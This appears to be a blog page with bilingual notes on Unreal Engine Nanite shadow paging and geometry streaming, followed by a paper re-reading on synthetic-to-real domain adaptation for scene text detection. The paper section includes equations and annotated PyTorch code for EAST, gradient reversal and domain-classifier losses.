    Shadow Page Table and Physical Pages Pool

    阴影页表与物理页池

    webp

    Shadow Page Cache Invalidation

    阴影页缓存失效

    • Camera movement, if the movement is relatively smooth, there will not be many pages to update

      相机移动,如果移动相对平稳,就不会有很多页面需要更新

    • Any light movement or rotation will invalidate all cached pages for that light

      任何灯光移动或旋转都会使该灯光的所有缓存页面无效

    • Geometry that casts shadows moving, or being added or removed from the scene will invalidate any pages that overlap its bounding box from the light’s perspective

      投射阴影的几何体在场景中移动、添加或删除,将使从灯光角度与其边界框重叠的任何页面无效。

    • Geometry using materials that may modify mesh positions

      使用可能修改网格位置的材质的几何体

    Shadow Demo

    webp

    Conclusions

    结论

    • Number of shadow pages proportional to screen pixels

      与屏幕像素成比例的阴影页数

    • Shadow cost scales with resolution and number of lights per pixel

      阴影成本随分辨率和每像素的灯光数量而变化

    webp

    Streaming and Compression

    流式加载与压缩

    Streaming

    流式加载

    • Virtualized geometry

      虚拟几何体

      • Unlimited geometry at fixed memory budget

        固定内存预算下的无限几何图形

    • Conceptually similar to virtual texturing

      概念上类似于虚拟纹理

      • GPU requests needed data then CPU fulfills them.

        GPU 请求所需的数据,然后 CPU 完成它们。

      • Unique challenge: there must be no cracks in the geometry

        独特的挑战:几何体中不能出现裂缝

    • Cut DAG at runtime to only loaded geometry

      在运行时将 DAG 剪切为仅加载的几何体

      • Needs to always be a valid cut of full DAG

        需要始终是完整 DAG 的有效切割

      • Similar to LOD cutting. No cracks

        类似于 LOD 切割。无裂纹

    webp

    Paging

    分页

    • Fill fixed-sized pages with groups

      用组填充固定大小的页面

    • Based on spatial locality to minimize pages needed at runtime

      基于空间局部性,以最小化运行时所需的页面

      • Sort groups by mip and spatial locality

        按 mip 和空间位置对组进行排序

    • Root page (64k)

      根页面(64k)

      • First page contains top lod level(s) of DAG

        第一页包含 DAG 的顶级 lod 级别

      • Always resident on GPU so we always have something to render

        始终驻留在 GPU 上,所以我们总是有东西要渲染

    • Streaming Page (128k)

      流式页(128k)

      • Other lod levels of cluster groups

        集群组的其他 lod 水平

      • Lifetime is managed by an LRU on the CPU

        生命周期由 CPU 端的 LRU 管理

    • Page contents:

      页面内容:

      • Index data, vertex data, bounds, LOD info, material tables, etc.

        索引数据、顶点数据、包围体、LOD 信息、材质表等。

    webp

    Memory representation

    内存表示

    Vertex quantization and encoding

    顶点量化和编码

    • Global quantization

      全局量化

      • A combination of artist control and heuristics

        艺术家控制和启发式的结合

      • Clusters store values in local coordinates relative to the value min/max range

        簇把值存成相对于最小/最大范围的局部坐标

    • Per-cluster custom vertex format

      每簇自定义顶点格式

      • Uses minimum number of bits per component: ceil(log2(range))

        使用每个组件的最小位数:ceil(log2(range))

      • Just a string of bits, not even byte aligned

        只是一串比特,甚至没有字节对齐

    • Decoded using GPU bit-stream reader because of divergent encode format between clusters

      由于集群之间的编码格式不同,使用 GPU 比特流读取器进行解码
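
    A minimal sketch of per-cluster quantization and bit packing (using the slide's ceil(log2(range)) idea, written here as ceil(log2(range+1)) so exact powers of two also fit):

    from math import ceil, log2

    def quantize_cluster(positions, grid):
        # Snap to the global quantization grid first (artist/heuristic controlled).
        qpos = [[round(c / grid) for c in p] for p in positions]
        lo = [min(p[i] for p in qpos) for i in range(3)]
        hi = [max(p[i] for p in qpos) for i in range(3)]
        # Minimum bits per component for this cluster's min/max range.
        bits = [max(1, ceil(log2(hi[i] - lo[i] + 1))) for i in range(3)]

        stream, length = 0, 0
        for p in qpos:
            for i in range(3):
                stream |= (p[i] - lo[i]) << length  # value relative to the cluster min
                length += bits[i]                   # just a string of bits, not byte aligned
        return lo, bits, stream, length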

    webp

    Disk Representation

    磁盘表示法

    • Hardware LZ decompression

      硬件 LZ 解压

      • In consoles now, and on its way to PC with DirectStorage

        现已用于游戏主机,并将随 DirectStorage 登陆 PC

      • Unbeatably fast, but general purpose

        速度无与伦比,但用途广泛

      • String deduplication and entropy coding

        字符串重复数据删除和熵编码

    • For better compression

      为了更好的压缩

      • Domain-specific transforms

        特定于域的转换

      • Focus on redundancies not already captured by LZ, and massage the data to better fit how LZ compression works

        关注 LZ 尚未捕获的冗余,并对数据进行整理,使其更适合 LZ 压缩的工作方式

    • Transcode on the GPU

      GPU 上的转码

      • High throughput for parallel transforms, currently runs at ~50GB/s with fairly unoptimized code on PS5

        并行转换的高吞吐量,目前在 PS5 上以约 50GB/s 的速度运行,代码相当未优化

      • Powerful in combination with hardware LZ

        与硬件 LZ 结合使用功能强大

      • Eventually stream data directly to GPU memory

        最终将数据直接流式传输到 GPU 内存

    Results: Lumen in the Land of Nanite

    结果:《Lumen in the Land of Nanite》演示

    • 433M Input triangles, 882M Nanite triangles

      433M 输入三角形,882M Nanite 三角形

    • Raw data: 25.90GB Memory format: 7.67GB

      原始数据:25.90GB 内存格式:7.67GB

    • Compressed: 6.77GB Compressed disk format: 4.61GB

      压缩:6.77GB 压缩磁盘格式:4.61GB

    • ~20% improvement since Early Access

      自早期访问以来提高了约 20%

    • 5.6 bytes per Nanite triangle, 11.4 bytes per input triangle

      每个 Nanite 三角形 5.6 个字节,每个输入三角形 11.4 个字节

    • 1M triangles = ~10.9MB on disk

      1M 三角形 = 磁盘上约 10.9MB

    webp

    Welcome to Billions of Triangles World

    欢迎来到亿万三角形世界

    Jungle of Nanite Geometries

    Nanite 几何丛林

    webp

    References

    Paper Re-reading: Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild

    Resources

    Full text

    Abstract

    Deep-learning-based scene text detection algorithms can achieve good detection performance when they fully exploit annotated training data. However, manual labeling is time-consuming and labor-intensive, and in extreme cases the corresponding annotated data is simply unavailable. Using synthetic data is a very promising solution, except that the domain distributions of synthetic and real data do not match. To address this severe domain-distribution mismatch in scene text detection, a synthetic-to-real domain-adaptive scene text detection method is proposed, based on **Text Self-Training (TST) and Adversarial Text Instance Alignment (ATA)**. ATA helps the network learn domain-invariant features by training a domain classifier in an adversarial manner. TST reduces the adverse effects of false positives (FP) and false negatives (FN) from inaccurate pseudo-labels. Both components play a positive role in improving scene text detectors when adapting from synthetic to real scenes. The proposed method is evaluated by transferring from SynthText and VISD to ICDAR2015 and ICDAR2013. The experimental results verify its effectiveness, with improvements of more than 10%, which is of great significance for exploring domain-adaptive scene text detection.

    1 Introduction

    Scene text detection has attracted increasing attention for its numerous applications in computer vision, and has achieved great success over the past decades. However, these detection methods require large amounts of manually labeled training data, which is expensive and time-consuming. Although several public benchmarks already exist, they cover only very limited scenarios. In the real world, specific application tasks usually require collecting and annotating new training datasets, and collecting enough labeled data is difficult or even impossible. The expensive labeling cost has therefore become a major problem for deep-learning-based text detection applications.

    With the rapid development of computer graphics, an alternative is to use large amounts of synthetic data obtained from virtual worlds, where ground truth can be generated freely and automatically.

    • SynthText first provided a virtual scene text dataset, automatically generating synthetic images with word-level and character-level annotations.
    • VISD equips text synthesis with selective semantic segmentation to produce more realistic samples.
    • UnrealText provides realistic virtual scene text images via a 3D graphics engine, which renders scene and text as a whole to achieve a realistic appearance.

    Although synthetic data offers the possibility of replacing real images when training scene text detectors, with low annotation cost and high annotation accuracy, much prior work has also shown that training only on synthetic data degrades performance on real data, due to a phenomenon known as “domain shift”. As shown in Fig. 1, unlike common objects, text in real scenes has far more diversity in shape, color, font, size and orientation, which causes a large domain gap between synthetic and real data. Consequently, when a model learned only from synthetic data is applied to real data, its performance drops significantly.

    webp

    Examples from different datasets. The first row comes from the real datasets ICDAR 2013, ICDAR 2015 and ICDAR 2017 MLT.
    The second row comes from SynthText, VISD and UnrealText. A considerable domain gap remains between synthetic and real data.

    To solve the domain-shift problem, a synthetic-to-real domain-adaptive scene text detection method is proposed, which uses synthetic data and unlabeled real data to effectively improve the model's performance on real data. Inspired by [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org) and [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org), this paper proposes **Text Self-Training (TST)** and **Adversarial Text Instance Alignment (ATA)** to reduce domain shift.

    Self-training has achieved excellent results in domain-adaptive common object detection and semantic segmentation. However, the more diverse situations and complex backgrounds of scene text detection have not yet been explored in this direction. To better apply self-training to scene text detection, TST is used to suppress the adverse effects of the false positives and false negatives that occur in pseudo-labels. In addition, we are the first to use adversarial learning to help the model learn discriminative features of scene text. **Adversarial learning has been proven effective in tasks such as domain-adaptive image classification and common object detection. Since most scene text detectors are one-stage detectors with no region-proposal process, we propose ATA to align the discriminative features of text instances in an adversarial training manner.** The main contributions of this paper are:

    • We introduce **Text Self-Training (TST)**, which improves domain-adaptive scene text detection by minimizing the adverse effects of inaccurate pseudo-labels.
    • We propose **Adversarial Text Instance Alignment (ATA)** to help the model learn domain-invariant features, enhancing its generalization ability.
    • We are the first to introduce a synthetic-to-real domain adaptation method for scene text detection, which transfers knowledge from synthetic data (source domain) to real data (target domain).

    The proposed method is evaluated on scene-text-detection transfer tasks (e.g., SynthText → ICDAR 2015). The experimental results show that it effectively alleviates the domain-shift problem in scene text detection, and is of great significance for exploring domain-adaptive scene text detection.

    2.1 Scene Text Detection

    A brief review of scene text detection.

    2.2 Domain Adaptation

    Domain adaptation reduces the domain gap between training data and test data. Recent methods use more effective techniques to reduce the gap, such as combining a domain classifier with gradient reversal.

    2.3 Self-Training

    Previous work used self-training to compensate for the lack of classification information. However, due to the shortcomings of earlier work, text detection still needs further exploration with self-training methods.

    3 Proposed Method

    This section analyzes the problems caused by domain shift, introduces the principles of TST and ATA, and explains how to use them for domain adaptation. To evaluate our method, EAST is adopted as the baseline.

    3.1 Problem and Analysis

    Although synthetic scene text data can automatically generate diverse appearances and accurate ground truth, a model trained only on synthetic data cannot be directly applied to real scenes, because there is a significant domain shift between synthetic and real datasets. The problem is clearer from a probabilistic perspective. We call the synthetic data domain the source domain and the real data domain the target domain. Scene text detection can be viewed as learning the posterior $P(B|I)$ (predicting bounding boxes from image features), where $I$ denotes the image features and $B$ the predicted bounding boxes of text instances. Using Bayes' formula, the posterior $P(B|I)$ can be decomposed as:

    $$P(B|I)=\frac{P(I|B)*P(B)}{P(I)}=\frac{P(I|B)}{P(I)}*P(B)$$

    We make a covariate-shift assumption for this task, i.e., the prior $P(B)$ is the same for both domains (the delineation of the predicted boxes is identical, correctly marking the extent of the text). We also consider $P(I|B)$, the conditional probability of $I$, i.e., the likelihood of learning true features given that the prediction is true, to be the same for both domains. Therefore, the difference in the posterior is caused by the prior $P(I)$ (the extracted features differ). In other words, when detecting text instances, the difference in detection results is caused by domain-dependent features. To improve the model's generalization ability, it needs to learn more domain-invariant features, keeping $P(I)$ the same regardless of which domain the input image belongs to (forcing the model to extract the same features when reading synthetic and real data). In the EAST model, the image features $P(I)$ refer to the features output by the backbone. Hence, the feature maps should be aligned between the source and target domains (i.e., $P_{s}(I)=P_{t}(I)$). To achieve this, we propose ATA to align these features; more details are given in the next subsection.

    3.2 Adversarial Text Instance Alignment

    Inspired by [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org), ATA is adopted to help the network learn domain-invariant features. In the EAST model, the image features $P(I)$ refer to the feature-map output of the backbone (i.e., the 384-channel, 1/32-scale features in Fig. 2). To align the features $P(I)$ between the source and target domains, a domain classifier is used to confuse the feature domains. Specifically, the domain classifier is trained on each input image and predicts the domain label to which the image belongs (y_pred_prob_f in the code). Let the model's input sample be $x\in X$, where $X$ is some input space. $y_i$ denotes the domain label of the $i$-th training image (y_true in the code), with $y_i=0$ for the source domain and $y_i=1$ for the target domain. $p_i(x)$ is the output of the domain classifier, and cross entropy is used as the loss function:

    $$L_d=-\sum_i\big(y_i\ln p_i(x)+(1-y_i)\ln(1-p_i(x))\big)$$

    def bce_loss(y_true, y_pred_logits):
        # y_true: ground-truth label (0 or 1).
        # y_pred_logits: the model's raw predictions (logits), i.e. outputs before the activation.
        # y_pred_prob = F.sigmoid(y_pred_logits)
        # y_true_f = y_true.view(-1)
        # y_true_f = y_true
        y_pred_logits = y_pred_logits.view(-1)
        # Clamp predictions to [1e-7, 1 - 1e-7] to keep the log numerically stable.
        y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7)
        # Cross-entropy loss, averaged over all elements.
        return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean()

    To learn domain-invariant features, the parameters are optimized in an adversarial way: the domain classifier's parameters are optimized by minimizing the domain-classification loss above, while the base network's parameters are optimized by maximizing it. More concretely, a Gradient Reversal Layer (GRL) is added between EAST's backbone and the domain classifier; the sign of the gradient is reversed when passing through the GRL. (The GRL sits between the feature extractor and the domain classifier, so during backpropagation the gradient of the domain-classification loss is automatically negated before reaching the feature extractor's parameters, realizing a GAN-like adversarial loss; a minimal GRL sketch follows the total loss below.) As shown in Fig. 2, both the feature pyramid network (FPN) and the backbone minimize EAST's original loss $L_{task}$ during training. $L_{task}$ denotes the score-map loss and geometry loss in EAST; $L^t_{task}$ refers to training with pseudo-labels in the target domain, and $L^s_{task}$ to training in the source domain. The training objectives therefore differ across parameter spaces:

    $$\begin{cases}L_f=\min\big(L_{task}^t(\theta_f|x^t)+L_{task}^s(\theta_f|x^s)-\lambda L_d(\theta_f|(x^s,x^t))\big)&\theta_f\in F,\\L_d=\min\big(L_d(\theta_d|(x^s,x^t))\big)&\theta_d\in C,\\L_h=\min\big(L_{task}^t(\theta_h|x^t)+L_{task}^s(\theta_h|x^s)\big)&\theta_h\in D.\end{cases}$$

    • Backbone objective: minimize the detection loss and maximize the domain classifier's loss (it must both fool the domain classifier and extract useful features).
    • Domain classifier objective: minimize the domain classifier's loss.
    • FPN objective: minimize the detection loss (it still performs label prediction).

    Here $F$, $C$ and $D$ are the parameter spaces of the backbone, the domain classifier and the FPN, respectively. The overall training objective is:

    $$L=L_f+L_h+\lambda L_d$$
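
    The code below uses a GradientScalarLayer that the excerpts never define. A minimal PyTorch sketch of such a gradient-reversal/scaling layer (an assumption consistent with the description above, not necessarily the repository's exact code) is:

    import torch

    class _GradientScalarFn(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x, weight):
            ctx.weight = weight
            return x.view_as(x)          # identity in the forward pass

        @staticmethod
        def backward(ctx, grad_output):
            # Scale (and, for negative weights, reverse) the gradient on the way back.
            return ctx.weight * grad_output, None

    class GradientScalarLayer(torch.nn.Module):
        def __init__(self, weight):
            super().__init__()
            self.weight = weight         # e.g. -0.1 reverses and scales the gradient

        def forward(self, x):
            return _GradientScalarFn.apply(x, self.weight)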

    class Loss_target(nn.Module):
        def __init__(self, weight_angle=10):
            # weight_angle: weight of the angle loss (default 10); controls how much
            # the angle term contributes to the total loss.
            super(Loss_target, self).__init__()
            self.weight_angle = weight_angle
            # Binary cross-entropy (bce_loss), used in forward() for the domain loss.
            self.bce = bce_loss

        def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map, pre_domain):
            if torch.sum(gt_score) < 1:
                # No valid targets: return 0 loss to avoid errors or useless computation.
                return torch.sum(pred_score + pred_geo) * 0

            # Dice loss for classification; pred_score * (1 - ignored_map) masks out
            # the regions that should be ignored.
            classify_loss = get_dice_loss(gt_score, pred_score * (1 - ignored_map))

            # The target-domain label is 1 (moved to the GPU); the BCE measures how
            # far the predicted domain score is from it.
            gt_doamin = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
            doamin_loss = self.bce(gt_doamin, pre_domain)

            # Geometry loss: IoU loss plus angle loss, weighted by weight_angle.
            iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)
            angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
            iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
            geo_loss = self.weight_angle * angle_loss + iou_loss
            # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
            return geo_loss, classify_loss, doamin_loss  # geometry, classification and domain losses

    Here $\lambda$ is a trade-off parameter, set to 0.2 in all experiments. By optimizing this loss, the network can learn more domain-invariant text features and transfer better from synthetic to real data.

    webp

    Network architecture with the corresponding optimization objectives. $\theta$ denotes the parameters of EAST. The domain classifier (green) is added after the feature extractor via a gradient reversal layer, which multiplies the gradient by a certain negative constant during backpropagation-based training. $L_{task}$ is EAST's original detection loss and $L_d$ is the domain classifier's loss.

    cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # config list specifying layer types and channel counts

    def make_layers(cfg, batch_norm=False):
        layers = []      # collected layers
        in_channels = 3  # 3 channels for the input image
        for v in cfg:
            if v == 'M':  # 'M' adds a 2x2 max-pooling layer
                layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
            else:         # otherwise a conv layer, optionally followed by batch norm, then ReLU
                conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
                if batch_norm:
                    layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
                else:
                    layers += [conv2d, nn.ReLU(inplace=True)]
                in_channels = v  # next layer's input channels = this conv's output channels
        return nn.Sequential(*layers)  # pack all layers into a sequential container


    class VGG(nn.Module):
        def __init__(self, features):
            super(VGG, self).__init__()
            self.features = features  # the convolutional layers
            self.avgpool = nn.AdaptiveAvgPool2d((7, 7))  # adaptive average pooling to a 7x7 feature map
            self.classifier = nn.Sequential(
                nn.Linear(512 * 7 * 7, 4096),
                nn.ReLU(True),
                nn.Dropout(),
                nn.Linear(4096, 4096),
                nn.ReLU(True),
                nn.Dropout(),
                nn.Linear(4096, 1000),
            )  # fully connected classifier with ReLU activations and Dropout

            for m in self.modules():  # weight initialization
                if isinstance(m, nn.Conv2d):
                    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                    if m.bias is not None:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.Linear):
                    nn.init.normal_(m.weight, 0, 0.01)
                    nn.init.constant_(m.bias, 0)

        def forward(self, x):
            x = self.features(x)       # convolutional features
            x = self.avgpool(x)        # pool the feature map to 7x7
            x = x.view(x.size(0), -1)  # flatten for the fully connected layers
            x = self.classifier(x)     # final classification prediction
            return x


    class extractor(nn.Module):  # feature extraction module
        def __init__(self, pretrained):
            super(extractor, self).__init__()
            vgg16_bn = VGG(make_layers(cfg, batch_norm=True))  # VGG16 with batch norm
            if pretrained:  # load pretrained weights from a local path
                # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
                # vgg16_bn.load_state_dict(state_dict)
                vgg16_bn.load_state_dict(torch.load(
                    '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
            self.features = vgg16_bn.features  # the convolutional part of VGG16 (used for feature extraction)

        def forward(self, x):
            out = []
            for m in self.features:  # run x through each layer in turn
                x = m(x)
                if isinstance(m, nn.MaxPool2d):  # save the output of every max-pooling layer
                    out.append(x)
            return out[1:]  # return feature maps from the second pooling layer on, to match the scales needed downstream
    class merge(nn.Module):  # EAST's core feature-merging branch: fuses feature maps from different scales by progressive upsampling, concatenation and convolution, as in the feature-fusion stage of detection/segmentation networks.
        def __init__(self):
            super(merge, self).__init__()

            self.conv1 = nn.Conv2d(1024, 128, 1)
            self.bn1 = nn.BatchNorm2d(128)
            self.relu1 = nn.ReLU()
            self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
            self.bn2 = nn.BatchNorm2d(128)
            self.relu2 = nn.ReLU()

            self.conv3 = nn.Conv2d(384, 64, 1)
            self.bn3 = nn.BatchNorm2d(64)
            self.relu3 = nn.ReLU()
            self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
            self.bn4 = nn.BatchNorm2d(64)
            self.relu4 = nn.ReLU()

            self.conv5 = nn.Conv2d(192, 32, 1)
            self.bn5 = nn.BatchNorm2d(32)
            self.relu5 = nn.ReLU()
            self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
            self.bn6 = nn.BatchNorm2d(32)
            self.relu6 = nn.ReLU()

            self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
            self.bn7 = nn.BatchNorm2d(32)
            self.relu7 = nn.ReLU()

            for m in self.modules():
                if isinstance(m, nn.Conv2d):
                    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                    if m.bias is not None:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)

        def forward(self, x):
            # F.interpolate upsamples a feature map to a larger resolution (bilinear);
            # torch.cat concatenates it with the skip feature map along the channel
            # axis, combining information from different scales.
            y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
            y = torch.cat((y, x[2]), 1)
            y = self.relu1(self.bn1(self.conv1(y)))
            y = self.relu2(self.bn2(self.conv2(y)))

            y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
            y = torch.cat((y, x[1]), 1)
            y = self.relu3(self.bn3(self.conv3(y)))
            y = self.relu4(self.bn4(self.conv4(y)))

            y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
            y = torch.cat((y, x[0]), 1)
            y = self.relu5(self.bn5(self.conv5(y)))
            y = self.relu6(self.bn6(self.conv6(y)))

            y = self.relu7(self.bn7(self.conv7(y)))
            return y


    class output(nn.Module):  # output head
        def __init__(self, scope=512):
            super(output, self).__init__()
            self.conv1 = nn.Conv2d(32, 1, 1)  # 1x1 convs producing the different prediction maps
            self.sigmoid1 = nn.Sigmoid()      # sigmoids turning the conv outputs into probabilities

            # self.conv1_1 = nn.Conv2d(32, 1, 1)
            # self.sigmoid1_1 = nn.Sigmoid()

            self.conv2 = nn.Conv2d(32, 4, 1)
            self.sigmoid2 = nn.Sigmoid()
            self.conv3 = nn.Conv2d(32, 1, 1)
            self.sigmoid3 = nn.Sigmoid()
            self.scope = 512  # scale factor for the location predictions

            # GRL domain classifier
            # self.gap = nn.AdaptiveAvgPool2d(1)
            # self.sigmoid_gap = nn.Sigmoid()
            # self.GRL = RevGrad()
            # self.conv_gap = nn.Conv2d(32, 1, 1)

            for m in self.modules():
                if isinstance(m, nn.Conv2d):
                    # Kaiming-normal init for conv weights; biases set to 0.
                    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                    if m.bias is not None:
                        nn.init.constant_(m.bias, 0)

        def forward(self, x):
            # score_1 = self.GRL(x)
            # grl = self.sigmoid_gap(self.conv_gap(score_1))

            # domain_feature = self.gap(self.GRL(C[3]))
            # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

            score = self.sigmoid1(self.conv1(x))  # score map, via sigmoid
            loc = self.sigmoid2(self.conv2(x)) * self.scope  # location prediction, sigmoid then scaled
            angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi  # angle prediction, remapped around 0
            geo = torch.cat((loc, angle), 1)  # concatenate location and angle into the geometry output
            return score, geo
    class DAImgHead(nn.Module):
        """
        Adds a simple image-level domain classifier head.
        """

        def __init__(self):
            """
            Arguments:
                in_channels (int): number of channels of the input feature
                USE_FPN (boolean): whether the FPN feature extractor is used
            """
            super(DAImgHead, self).__init__()

            self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1)  # 512 -> 256 channels
            self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1)    # 256 -> 1 channel

            for l in [self.conv1_da, self.conv2_da]:  # normal init (mean 0, std 0.001), zero bias
                torch.nn.init.normal_(l.weight, std=0.001)
                torch.nn.init.constant_(l.bias, 0)

        def forward(self, x):  # conv1_da + ReLU, then conv2_da
            t = F.relu(self.conv1_da(x))
            return self.conv2_da(t)


    class DAInsHead(nn.Module):
        """
        Adds a simple instance-level domain classifier head.
        """

        def __init__(self):
            """
            Arguments:
                in_channels (int): number of channels of the input feature
            """
            super(DAInsHead, self).__init__()
            self.fc1_da = nn.Linear(2028, 1024)  # 2028 -> 1024 features
            self.fc2_da = nn.Linear(1024, 1024)  # 1024 -> 1024 features
            self.fc3_da = nn.Linear(1024, 1)     # 1024 -> 1 output
            for l in [self.fc1_da, self.fc2_da]:
                # fc1/fc2: normal init with std 0.01; fc3 below uses std 0.05; all biases 0.
                nn.init.normal_(l.weight, std=0.01)
                nn.init.constant_(l.bias, 0)
            nn.init.normal_(self.fc3_da.weight, std=0.05)
            nn.init.constant_(self.fc3_da.bias, 0)

        def forward(self, x):  # fc1 + ReLU + dropout(0.5), fc2 + ReLU + dropout(0.5), then fc3
            x = F.relu(self.fc1_da(x))
            x = F.dropout(x, p=0.5, training=self.training)

            x = F.relu(self.fc2_da(x))
            x = F.dropout(x, p=0.5, training=self.training)

            x = self.fc3_da(x)
            return x


    class DomainAdaptationModule(torch.nn.Module):
        """
        Module for the domain adaptation component: it processes image features for
        domain adaptation so the model adapts better across domains. Takes feature
        maps from the backbone plus instance feature vectors, domain labels and
        proposals. Works for both FPN and non-FPN setups.
        """

        def __init__(self):
            super(DomainAdaptationModule, self).__init__()

            self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7)  # 7x7 average pooling
            self.gap = nn.AdaptiveAvgPool2d(1)  # adaptive average pooling: one value per channel
            self.sigmoid_gap = nn.Sigmoid()     # squashes feature values to [0, 1]

            # Gradient reversal layers: they reverse the gradient during backpropagation,
            # encouraging the network to learn domain-invariant features.
            self.grl_img = GradientScalarLayer(-1.0 * 0.1)
            self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
            # Same idea with positive weights, used for consistency objectives.
            self.grl_img_consist = GradientScalarLayer(1.0 * 0.1)
            self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

            self.imghead = DAImgHead()  # image-level domain classification head
            self.inshead = DAInsHead()  # instance-level domain classification head

        def forward(self, img_features):
            """
            Arguments:
                img_features (list[Tensor]): features computed from the images that are
                    used for computing the predictions.

            Returns:
                da_img_features: image-level domain predictions in [0, 1].
            """
            # Image-level features squeezed to 1x1 by gap, then passed through the GRL.
            img_grl_fea = self.grl_img(self.gap(img_features))
            # The reversed features go through the image head, then a sigmoid.
            da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea))
            return da_img_features


    class EAST(nn.Module):  # EAST inherits from nn.Module, the base class of all PyTorch models
        def __init__(self, pretrained=True):
            super(EAST, self).__init__()
            self.extractor = extractor(pretrained)  # feature extractor (pretrained VGG16-BN backbone when pretrained=True)
            self.merge = merge()    # feature-merging branch
            self.output = output()  # prediction head
            self.DomainAdaptation = DomainAdaptationModule()  # domain adaptation module

        def forward(self, x):
            C = self.extractor(x)  # multi-scale features; C[3] is the deepest feature map
            class_domain = self.DomainAdaptation(C[3])  # domain prediction from the deepest features
            # merge(C) fuses the multi-scale features; output(...) produces the final
            # detection predictions; class_domain is the domain classifier's output.
            return self.output(self.merge(C)), class_domain

    3.3 Text Self-Training

    Previous work has demonstrated the effectiveness of self-training for domain adaptation. However, two major problems of self-training still need further study: false positives (FP, predicted but not actually there) and false negatives (FN, there but not predicted) occurring in the pseudo-labels. Incorrect pseudo-labels can have a severely negative effect on our network. To overcome these problems, TST is designed to minimize the adverse effects of FPs and FNs.

    3.3.1 Reducing False Negatives.

    webp

    Top: the proposed text self-training framework. SWS is used to filter the positive samples in the pseudo-labels to minimize false positives, and the third of negative samples with the lowest confidence is selected as the final negative samples to minimize false negatives.
    Bottom: a sample-space illustration of the pseudo-labels.
    (a): weak training effectively filters out false negatives.
    (b): false positives are filtered out by the stroke width and its standard deviation ($\sigma$) via SWS.

    Inspired by [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org), a weakly supervised scheme is used to minimize the influence of false negatives. As defined in EAST, the original score-map loss is

    $$L_s=-\sum_{i\in Pos}\beta Y^*\log\widehat{Y}-\sum_{i\in Neg}(1-\beta)(1-Y^*)\log(1-\widehat{Y})$$

    where $\widehat Y=F_s$ is the prediction of the score map and $Y^*$ is the ground truth.

    Although the network is optimized via backpropagation by learning the background loss (i.e., the negative examples), false negatives appearing in the pseudo-labels mislead the network. We assume that false negatives are mainly selected through hard negative mining, e.g. blurred text and unusual fonts that resemble the background. To reduce their adverse effect, we ignore some background examples that have a high probability of being foreground according to their confidence scores.

    EAST's negative examples form a pixel map, where a pixel is more likely to be treated as a negative pixel when its corresponding confidence score is higher.

    Therefore, we select the fraction of negative-sample pixels with the lowest confidence scores (e.g., $Neg/3$) as the final negative examples, denoted $\widehat{Neg}/3$ (red line) in the figure. The corresponding expression is $\widehat{Neg}=\eta\,Neg$, where $\eta$ is set to $1/3$ in all experiments. For the pixels with high confidence scores, the network does not optimize that part of the loss. The modified loss function is defined as:

    $$L_{sw}=-\sum_{i\in Pos}\beta Y_i^*\log\widehat{Y}-\sum_{i\in\widehat{Neg}}(1-\beta)(1-Y_i^*)\log(1-\widehat{Y})$$

    3.3.2 Reducing False Positives.

    Corresponding to false negatives, false positives also interfere with the network severely. Some patterns and designs in natural scenes are extremely easy to mistake for text, leading to inaccurate pseudo-labels. Instead of the Support Region Reliable Score (SRRS), we propose a more reasonable Stroke Width Score (SWS), which uses the Stroke Width Transform (SWT) to evaluate the predicted boxes of text instances.

    $$SRRS(r^*)=\frac{1}{N_s}\sum_{i=1}^{N_s}IoU(r_i,r^*)\cdot P(c^*|r_i)$$

